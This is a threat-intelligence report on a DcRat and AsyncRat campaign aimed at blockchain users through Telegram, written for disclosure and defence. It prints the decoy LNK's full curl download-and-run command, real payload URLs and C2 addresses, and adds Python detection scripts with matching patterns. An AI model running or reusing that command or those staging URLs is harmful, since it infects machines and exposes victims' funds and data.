
Overview

Qi'anxin Threat Intelligence Center and the Skyrocket Falcon team found a group of unknown attackers targeting blockchain customers during terminal operation. The malicious archive is "transfer screenshot 2025.5.31.zip", which the attackers spread one-to-one through the Telegram messaging app. The archive contains an Lnk decoy: double-clicking it pops up a screenshot of a transfer record and drops a white-plus-black (DLL sideloading) component that loads DcRat in memory. The C2 uses a self-signed certificate mimicking qianxin.com.

Currently, the "Liuhe" advanced threat defense engine in Qi'anxin Tianqing blocks this Lnk, and we recommend that customers enable the cloud checking function to discover unknown threats.


Sample Analysis

The Lnk file points to the following commands:

Cmd:
C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"

The Lnk downloads the VBS script from the remote server and starts it. The script carries Chinese comments and closely resembles mainstream GPT-generated script code; it downloads the following files:

| Download Link | File Path | Description |
|---|---|---|
| https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5CF1D461CBF74FC4A2379ACCC8D45CA7.jpg | C:\Users\Public\TokenPocket.jpg | Bait picture |
| https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/C16E6F8B5A614F74A597C3F055484754.txt | C:\Users\Public\pythonw.exe | White file for loading the malicious DLL |
| https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/2C36BCF9295640CFB21933AE822F5D75.res | C:\Users\Public\python310.dll | Black DLL component with a legitimate signature |

The decoy file is shown below:

The dropped black DLL carries a valid digital signature from "Wuhoo Harmonious Reed Trade Co., Ltd.":

The malicious logic lives in the DLL's Py_Main function, whose main job is to load a Shellcode in memory.

This Shellcode is a loader for the final payload, DCRat, with C2 103.45.68.150:80.

After connecting to the C2, it starts PowerShell to download the second-stage payload:

| Download Link | File Path | Description |
|---|---|---|
| https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/27391835C6744B469E35C90327E527C8.txt | C:\Users\Public\arphaCrashReport64.exe | White file for loading the malicious DLL |
| https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/B999853FC3464384A7E5E5B9B71147E5.res | C:\Users\Public\arphadump64.dll | Black DLL component |
| https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/540B0BAA3C5641EC9BF220021A16D230.ini | C:\Users\Public\arphaCrashReport64.ini | Encrypted shellcode |
| https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/15AD296C703E4D648CA98FED712C6C49.jpg | C:\Users\Public\photo_2024-12-07_00-24-16.jpg | Bait image |

In the second stage the attacker pops up another decoy image, showing that the transfer has completed:

The second-stage white-plus-black component reads arphaCrashReport64.ini, decrypts it into Shellcode, and injects it into a newly created rundll32.exe process.

The Shellcode behaves as before, loading the same DCRat payload, with C2 38.46.13.170:8080.
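The two stages above share a recognisable shape on the endpoint: cmd.exe running curl to drop a script under C:\Users\Public and immediately starting it, a "white" binary executing from C:\Users\Public so that the "black" DLL beside it gets sideloaded, and rundll32.exe being spawned by that white binary. The following Python is an added example (not part of the Qi'anxin report) that flags those three behaviours over constructed, Sysmon-style process-creation events. The field names image, command_line and parent_image are assumptions modelled on Sysmon event ID 1, and the parent process of pythonw.exe in the sample data is assumed to be wscript.exe running the VBS.

```python
import re
from dataclasses import dataclass

# Every path comparison is done in lower case.
PUBLIC_DIR = "c:\\users\\public\\"

# White binaries abused in the report; extend with your own sideload hosts.
SIDELOAD_HOSTS = {"pythonw.exe", "arphacrashreport64.exe"}

# curl -o <output path> <url> ... && start <path>  (the LNK command line shape)
CURL_STAGER = re.compile(
    r"curl\s+-o\s+(?P<out>\S+)\s+(?P<url>https?://\S+).*?&&\s*start\s+(?P<run>\S+)",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    command_line: str
    parent_image: str   # full path of the parent process


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def check_event(ev: ProcEvent) -> list[str]:
    """Return a list of finding strings for one event (empty if nothing matched)."""
    findings = []
    img = ev.image.lower()
    name = _basename(ev.image)
    parent = ev.parent_image.lower()

    # 1. cmd.exe: curl writes a file under C:\Users\Public and then starts that same file.
    m = CURL_STAGER.search(ev.command_line)
    if name == "cmd.exe" and m:
        out = m.group("out").strip('"').lower()
        run = m.group("run").strip('"').lower()
        if out.startswith(PUBLIC_DIR) and out == run:
            findings.append(f"curl-to-public-then-start: {m.group('url')} -> {out}")

    # 2. A known sideload host executing from C:\Users\Public (DLL dropped beside it).
    if name in SIDELOAD_HOSTS and img.startswith(PUBLIC_DIR):
        findings.append(f"white-binary-from-public: {ev.image}")

    # 3. rundll32.exe created by a sideload host living in C:\Users\Public (stage 2 injection target).
    if name == "rundll32.exe" and _basename(parent) in SIDELOAD_HOSTS and parent.startswith(PUBLIC_DIR):
        findings.append(f"rundll32-from-public-host: {ev.parent_image}")

    return findings


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> findings, keeping only events that produced findings."""
    return {i: f for i, ev in enumerate(events) if (f := check_event(ev))}


# Constructed sample events: three modelled on the report's chain, one benign curl.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\cmd.exe",
        command_line=r'C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"',
        parent_image=r"C:\Windows\explorer.exe",
    ),
    ProcEvent(  # assumed parent: wscript.exe running aa.vbs
        image=r"C:\Users\Public\pythonw.exe",
        command_line=r"C:\Users\Public\pythonw.exe",
        parent_image=r"C:\Windows\System32\wscript.exe",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\rundll32.exe",
        command_line="rundll32.exe",
        parent_image=r"C:\Users\Public\arphaCrashReport64.exe",
    ),
    ProcEvent(  # benign: curl without the "start the dropped file" half, outside Public
        image=r"C:\Windows\System32\cmd.exe",
        command_line=r'cmd.exe /c "curl -o C:\Temp\x.txt https://example.com/x"',
        parent_image=r"C:\Windows\explorer.exe",
    ),
]

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_EVENTS).items():
        print(idx, found)
```

The first rule deliberately requires the curl output path and the started path to be identical; plain curl downloads are common on admin workstations, and it is the drop-then-execute pairing under a world-writable directory that is the signal here.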


Expanding the Leads

The same infrastructure was also used to host Bitcoin-selling websites, suspected to be fraud sites.

There are a small number of such sites active, and they seem to be built from the same templates:

Samples of the same origin were observed on VT and are suspected to be spread via SEO:

| Md5 | Filename |
|---|---|
| 3cf9a8d8b7b68160d7523e60b0e43cd5 | letsvpn-latest.exe |

It also carries a digital signature, which has since been revoked:

The sandbox identifies it as AsyncRat, with C2 148.178.16.22:6666.


Summary

Currently, the full line of products built on the Qi'anxin Threat Intelligence Center's threat intelligence data, including the Qi'anxin Threat Intelligence Platform (TIP), Tianqing, the SkyEye Advanced Threat Detection System, Qi'anxin NGSOC, and Qi'anxin Situational Awareness, already supports accurate detection of such attacks.


IOC

FileHash-MD5:

05339834a0e7317505c74b58b19aaf0e

1b98984d2438d7a5d14b4f373b55603b

3cf9a8d8b7b68160d7523e60b0e43cd5

DcRat C2:

103.45.68.150:80|443

103.45.68.244:80|443

103.45.68.203:80|443

38.46.13.170:8080

AsyncRat C2:

148.178.16.22:6666

zl-web-images.oss-cn-shenzhen.aliyuncs.com
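The C2 entries above use an "ip:port|port" shorthand that most blocklists and SIEM lookups will not consume directly. The following Python is an added example (not part of the Qi'anxin report) that expands that notation into concrete (ip, port) pairs and matches them, together with the staging domain, against constructed connection-log lines in an assumed "timestamp src dst:port sni-or-host" format. A connection to a listed IP on an unlisted port is reported separately as a weaker hit, since the DcRat C2s above already alternate between 80 and 443.

```python
# IOC text copied from the report's IOC section (the "ip:port|port" form is the report's own).
C2_IOCS = """
103.45.68.150:80|443
103.45.68.244:80|443
103.45.68.203:80|443
38.46.13.170:8080
148.178.16.22:6666
"""

DOMAIN_IOCS = {"zl-web-images.oss-cn-shenzhen.aliyuncs.com"}


def expand_c2(text: str) -> set[tuple[str, int]]:
    """Turn 'ip:p1|p2' lines into a set of (ip, port) tuples."""
    pairs = set()
    for token in text.split():
        ip, sep, ports = token.partition(":")
        if not sep:
            raise ValueError(f"missing port in IOC entry: {token!r}")
        for p in ports.split("|"):
            pairs.add((ip, int(p)))
    return pairs


def match_logs(lines: list[str], pairs: set[tuple[str, int]], domains: set[str]) -> list[tuple[str, str, str]]:
    """Return (timestamp, hit-type, indicator) for every line touching an IOC."""
    c2_ips = {ip for ip, _ in pairs}
    hits = []
    for ln in lines:
        ts, _src, dst, host = ln.split()
        ip, _, port = dst.rpartition(":")
        if (ip, int(port)) in pairs:
            hits.append((ts, "c2-exact", dst))
        elif ip in c2_ips:
            hits.append((ts, "c2-ip-only", dst))   # same C2 host, port not in the list
        if host in domains:
            hits.append((ts, "staging-domain", host))
    return hits


# Constructed log lines; 203.0.113.10 is a TEST-NET address standing in for the OSS edge.
SAMPLE_LOGS = [
    "2025-06-01T10:00:01Z 10.0.0.5 103.45.68.150:443 -",
    "2025-06-01T10:00:02Z 10.0.0.5 38.46.13.170:8080 -",
    "2025-06-01T10:00:03Z 10.0.0.7 103.45.68.244:8443 -",
    "2025-06-01T10:00:04Z 10.0.0.7 203.0.113.10:443 zl-web-images.oss-cn-shenzhen.aliyuncs.com",
    "2025-06-01T10:00:05Z 10.0.0.9 8.8.8.8:53 -",
]

if __name__ == "__main__":
    for hit in match_logs(SAMPLE_LOGS, expand_c2(C2_IOCS), DOMAIN_IOCS):
        print(*hit)
```

Note that the staging host is a shared Alibaba Cloud OSS endpoint, so matching on the full bucket hostname (via SNI or proxy logs) is more precise than blocking the resolved IP.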
